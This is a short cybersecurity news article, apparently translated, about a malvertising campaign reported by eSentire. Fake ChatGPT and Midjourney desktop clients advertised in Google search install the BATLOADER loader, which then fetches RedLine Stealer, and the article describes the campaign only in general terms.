ChatGPT, Midjourney, where the hell is the native client for Windows?!

Attackers use fake advertisements in Google search to spread the RedLine Stealer data thief. The target of the attack are users who are looking for generative artificial intelligence services such as ChatGPT And Midjourney, informs eSentire.

ChatGPT and Midjourney are popular generative AI services that don’t have their own native apps. All interaction with ChatGPT takes place through the web interface, and with Midjourney through Discord. These restrictions force users to look for workarounds, which often lead to downloading and installing malware.

Literally yesterday we wrote about dozens of fraudulent ChatGPT apps for Android and iOS, which, if they provide the promised functionality, do it very badly, at the same time robbing users thanks to a very expensive subscription.

As for desktop clients for ChatGPT and Midjourney, in the reviewed eSentire malicious campaign, when the promised programs are downloaded to the victim’s computer, to avert eyes, a pop-up window with legitimate ChatGPT and Midjourney addresses – “chat.openai.com” or “midjourney.com” – opens via Microsoft Edge WebView2. However, the malicious BATLOADER loader is also loaded in parallel, which, in turn, downloads and launches RedLine Stealer from a remote attacker’s server.

RedLine Stealer is a data thief capable of stealing personal data, passwords, cookies, and other information from an infected computer. Interestingly, last week another cybersecurity company, Trend MicroSame fixed cases of distribution of fake ChatGPT and Midjourney through fraudulent advertisements.

This is not the first time that BATLOADER operators have exploited user interest in AI to spread malware. In March 2023 eSentire informed about similar attacks that used ChatGPT traps to install Vidar Stealer and Ursnif infostealers.

eSentire also indicated that Google search ad abuse has decreased since the start of 2023, indicating that Google is taking active steps to crack down on fraudsters.